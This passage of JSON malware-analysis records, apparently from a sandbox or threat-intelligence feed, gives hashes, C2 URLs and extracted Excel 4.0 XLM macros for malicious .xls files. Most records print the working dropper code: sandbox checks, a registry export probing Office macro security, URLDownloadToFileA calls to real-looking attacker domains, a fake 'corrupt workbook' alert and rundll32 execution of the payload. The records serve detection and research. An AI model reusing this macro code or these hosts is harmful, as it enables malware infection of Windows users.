CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"b6b6V1tSsd\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6e6f27fe4bf517c39543b1808deef6f3dad12cd83d694763c73eba6443d4fe05"},"analysis":{"reported":"2020-04-09T16:16:57Z","score":10},"files":[{"filename":"6e6f27fe4bf517c39543b1808deef6f3dad12cd83d694763c73eba6443d4fe05","filesize":168448,"md5":"47a76df16fcb81f5f1b0353550c54b00","sha1":"33f7309d0ca0423e9e92689a5e0dd5ba54d17105","sha256":"6e6f27fe4bf517c39543b1808deef6f3dad12cd83d694763c73eba6443d4fe05","sha512":"89e1ede4402ce344b62d650537f45ab4124f1754cb61195a70d66906f487dcaaa57944c33532f3101f23f610e096b7bb578975fae9f39ff1a177edf637e535cf","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6e6f27fe4bf517c39543b1808deef6f3dad12cd83d694763c73eba6443d4fe05.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"bO9Py88szM\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6e71095378420b606738dc6750dc7a300334959e33e20cbd8f6fed5bfcbcb8ba"},"analysis":{"reported":"2020-04-09T16:16:57Z","score":10},"files":[{"filename":"6e71095378420b606738dc6750dc7a300334959e33e20cbd8f6fed5bfcbcb8ba","filesize":168448,"md5":"22d75d318ca36aaa06d19baf2afdcba7","sha1":"9a641091c25f294cd52845d35c13ea4d87d5c648","sha256":"6e71095378420b606738dc6750dc7a300334959e33e20cbd8f6fed5bfcbcb8ba","sha512":"7d39ce4450a47447d41399ff2c06842fdda7631abeb9acd51a9d17c7efceccde1e1c4ebd54f4672f8343cfcd93204cbdf0123e3c5ff5bec21d32d82c66634d7e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6e71095378420b606738dc6750dc7a300334959e33e20cbd8f6fed5bfcbcb8ba.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"WOb3jrGp3M\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6e76e2815f7d5fee2b44b1bef5b30e72af6f0b9394bf2c075f9b3318b07b2507"},"analysis":{"reported":"2020-04-09T16:16:57Z","score":10},"files":[{"filename":"6e76e2815f7d5fee2b44b1bef5b30e72af6f0b9394bf2c075f9b3318b07b2507","filesize":141824,"md5":"0f34b7d9a7cf2bf236473777319bffd8","sha1":"17d9745b3de13de8982951a504cf990aaf9b099c","sha256":"6e76e2815f7d5fee2b44b1bef5b30e72af6f0b9394bf2c075f9b3318b07b2507","sha512":"a781b8f1392c9c00cd4d96efb2ef54a4678679b160ed7fc26eebdebf02ca272b8859a6fff8e07257279400aa7c875f4fb938699e68a999d91b81d98c12fe023d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6e76e2815f7d5fee2b44b1bef5b30e72af6f0b9394bf2c075f9b3318b07b2507.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wrjmkdod.xyz/SDFwef2fvbbe"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$28C$1\u003c770,CLOSE(FALSE),)\nIF(R$29C$1\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nWORKBOOK.HIDE(\"pFmJnmKILt\",TRUE)\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6e953cc2f304e014a4aa2424f92954e4631b37579e753ae8c468e735914d2fd2"},"analysis":{"reported":"2020-04-09T16:16:57Z","score":10},"files":[{"filename":"6e953cc2f304e014a4aa2424f92954e4631b37579e753ae8c468e735914d2fd2","filesize":171008,"md5":"9c91e26368a2f4582d9a6599e6e68fbd","sha1":"def337852a141079bd88c713d53855b2547368f3","sha256":"6e953cc2f304e014a4aa2424f92954e4631b37579e753ae8c468e735914d2fd2","sha512":"d0ab19ebef6a86d9fe6dc1506d5be14ba8810d9cc7e965dfa63944110503c8292459f0ec710353c8b342f965200e7cf4197c5a3d66815f58a07e2d5082c30b01","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6e953cc2f304e014a4aa2424f92954e4631b37579e753ae8c468e735914d2fd2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1mlu11fAx2\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6ebdedeee6f4b9cb25a76b241932a1f4ea53efcb014332db7e5388835f7dcb8a"},"analysis":{"reported":"2020-04-09T16:16:57Z","score":10},"files":[{"filename":"6ebdedeee6f4b9cb25a76b241932a1f4ea53efcb014332db7e5388835f7dcb8a","filesize":144384,"md5":"d3e03a6b30b6f30b81177613cf7ebcf4","sha1":"9bcb4c3ce68f528af083b8176009e6a6baaf1ef1","sha256":"6ebdedeee6f4b9cb25a76b241932a1f4ea53efcb014332db7e5388835f7dcb8a","sha512":"634abfb01e74d6b558a3dfad4705214ba47f00bea3d3be1acb67cd0352943fc6e3590d0002a9af7288b9e52f9cec4add56dd435bd4df5c6b8c9895a0565bcef2","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6ebdedeee6f4b9cb25a76b241932a1f4ea53efcb014332db7e5388835f7dcb8a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"WnCAUCWUCf\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6ecb1f3666bfdbd836499265d91e605f92e36f355ec8fb61343d3f7c122741c1"},"analysis":{"reported":"2020-04-09T16:16:57Z","score":10},"files":[{"filename":"6ecb1f3666bfdbd836499265d91e605f92e36f355ec8fb61343d3f7c122741c1","filesize":209920,"md5":"7f26db5ff3216380d92ef8af53653685","sha1":"42a2fe8a30bcdce23b2f1c91e78f3ec2b989e9ac","sha256":"6ecb1f3666bfdbd836499265d91e605f92e36f355ec8fb61343d3f7c122741c1","sha512":"cb7f59981e220dc01467ba2185fa52ead8321c582b8c91597618652815217ae200acd6cdc067750926db32e396ea2a7c472f451d4068315c0f96707de925e2d9","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6ecb1f3666bfdbd836499265d91e605f92e36f355ec8fb61343d3f7c122741c1.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"AHrHN4yMCc\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6ed2928d857d2c1b81bd82129bc91ba3103995d8acff06b4c6d3859cef8656b4"},"analysis":{"reported":"2020-04-09T16:16:57Z","score":10},"files":[{"filename":"6ed2928d857d2c1b81bd82129bc91ba3103995d8acff06b4c6d3859cef8656b4","filesize":132608,"md5":"19541952b7c36a9978709d022eed0b94","sha1":"768ecbabf7912a5cdfbf94bdaa96cb3ce318f402","sha256":"6ed2928d857d2c1b81bd82129bc91ba3103995d8acff06b4c6d3859cef8656b4","sha512":"9fb3ae4d44c6775002bda544d92c8ba8ac64f818688834ef50c8bae383b1814f92731caa4635e927019a132922bd22bd40608711c97a9af3ec60cc49133070b1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6ed2928d857d2c1b81bd82129bc91ba3103995d8acff06b4c6d3859cef8656b4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rosannahtacey.xyz/vg43"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rosannahtacey.xyz/vg43\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"PpDJF9jFeM\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6eead4d0427334659972450bfdd6b7cbe828ef965f73b55b7c079bc6875ec530"},"analysis":{"reported":"2020-04-09T16:16:57Z","score":10},"files":[{"filename":"6eead4d0427334659972450bfdd6b7cbe828ef965f73b55b7c079bc6875ec530","filesize":116224,"md5":"4235b98abf4a57e3c16b817df5b7c56d","sha1":"fb440036bc47030ad4be67c4f60ad0414cd00072","sha256":"6eead4d0427334659972450bfdd6b7cbe828ef965f73b55b7c079bc6875ec530","sha512":"28348c4e99c9913d804ba784cd9218a7ca7c27967a92e9b8214e45966eb37f1803738a07fdc78cbc05315eb6aebdbf389e0139b949ca7c168dad4d99950f8f19","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6eead4d0427334659972450bfdd6b7cbe828ef965f73b55b7c079bc6875ec530.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/aaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/aaeg4df12\",\"c:\\Users\\Public\\cwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"8FZz0nMzTL\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6f1277fd55bf3d37c36e5ca489255186d8e1192f31a06507f308f88dbfed8ec4"},"analysis":{"reported":"2020-04-09T16:16:57Z","score":10},"files":[{"filename":"6f1277fd55bf3d37c36e5ca489255186d8e1192f31a06507f308f88dbfed8ec4","filesize":167936,"md5":"b346736b71c6db9ed7a661c6d9e911da","sha1":"88ef56e27193225d0c0be1b3a054f65999691bd0","sha256":"6f1277fd55bf3d37c36e5ca489255186d8e1192f31a06507f308f88dbfed8ec4","sha512":"a11092ba30f9f1b2b70bb7a09ecc1b09b979789d9b1e52360db2bd957b3974de5af4cee8cb51440db638849b3679bfd96e1b2cdd0056c78a52668be939c98761","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6f1277fd55bf3d37c36e5ca489255186d8e1192f31a06507f308f88dbfed8ec4.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"sOH77wgvXO\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6f207fa1340fe1fba62372adc3d9ef017c3d9bb35d502ddb0de04bdb71f0a82d"},"analysis":{"reported":"2020-04-09T16:16:58Z","score":10},"files":[{"filename":"6f207fa1340fe1fba62372adc3d9ef017c3d9bb35d502ddb0de04bdb71f0a82d","filesize":225280,"md5":"016a69892adb3a88af67d4a2968c2c22","sha1":"778ec1eabbb278401e83e26f79af20e90fd0ba97","sha256":"6f207fa1340fe1fba62372adc3d9ef017c3d9bb35d502ddb0de04bdb71f0a82d","sha512":"2abfa69152f1999340a863503d3b3e35e8ce7feaa6cb2fc1212ce08b1d2993503dc341e11b7bc4698ca182424d469ceef5c772d19f6813f7bf3fca8e321a67ce","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6f207fa1340fe1fba62372adc3d9ef017c3d9bb35d502ddb0de04bdb71f0a82d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amberlessard.xyz/brg2sv"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amberlessard.xyz/brg2sv\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"BufPagoBqI\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6f2ba258fd20f1776979f45fcc22aaa84ff4e0dd081e4f52d80f03e23a316215"},"analysis":{"reported":"2020-04-09T16:16:58Z","score":10},"files":[{"filename":"6f2ba258fd20f1776979f45fcc22aaa84ff4e0dd081e4f52d80f03e23a316215","filesize":206336,"md5":"fb00d66f27d3287a3e7c0e9b26672848","sha1":"19cf3e2165620d8bfe693561f7b30311cec08c6e","sha256":"6f2ba258fd20f1776979f45fcc22aaa84ff4e0dd081e4f52d80f03e23a316215","sha512":"55fc8b8d82294cc17b53e62d364354bebc0b78ee0cfa98b2ad86bcef8cf289080d8021f9aba93c2be0ccffd65341882dd74215821b7ec36fafa35e0cd779f58c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6f2ba258fd20f1776979f45fcc22aaa84ff4e0dd081e4f52d80f03e23a316215.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"XHUu2XaMjq\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6f2f9f6cae89d1a66cd4d24df8515e1fb5fa08b183b1335e42e23e03a7d30b3d"},"analysis":{"reported":"2020-04-09T16:16:58Z","score":10},"files":[{"filename":"6f2f9f6cae89d1a66cd4d24df8515e1fb5fa08b183b1335e42e23e03a7d30b3d","filesize":152576,"md5":"b53aa8a0e91dcbcb8398add626d0c2a8","sha1":"1bf4e9ce996997713e79b9c90ad08160b40ea964","sha256":"6f2f9f6cae89d1a66cd4d24df8515e1fb5fa08b183b1335e42e23e03a7d30b3d","sha512":"4e15f3b6e5e91745bd6dbfef2ab0bd770805d81a290987d01faf87bddd4570d720b69288e6cc02a99156f1551d64bd73ee81b0ebded4c5a081a58de1980f62d7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6f2f9f6cae89d1a66cd4d24df8515e1fb5fa08b183b1335e42e23e03a7d30b3d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"TUuO1AuqPm\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"6f40403197178377a7f02412819f87197b12f96e8d5ebd7530561ad069c468ce"},"analysis":{"reported":"2020-04-09T16:16:58Z","score":10},"files":[{"filename":"6f40403197178377a7f02412819f87197b12f96e8d5ebd7530561ad069c468ce","filesize":212992,"md5":"e9a344894c6dd9d34ed8568bb622992c","sha1":"344bdc5b3b1656386ed77406e135d487926cf031","sha256":"6f40403197178377a7f02412819f87197b12f96e8d5ebd7530561ad069c468ce","sha512":"4c37234ba28c0b56c171bd2c6ba66d53a5df84ccb3ce2550f3f7304414085a51087dcb9114ee7c627b0dfe01f0556e233a05dcd90805a0cf089c0f3fb5383f6b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"6f40403197178377a7f02412819f87197b12f96e8d5ebd7530561ad069c468ce.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://assemble.sg/wp-front.php","https://cworld.top/wp-front.php"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 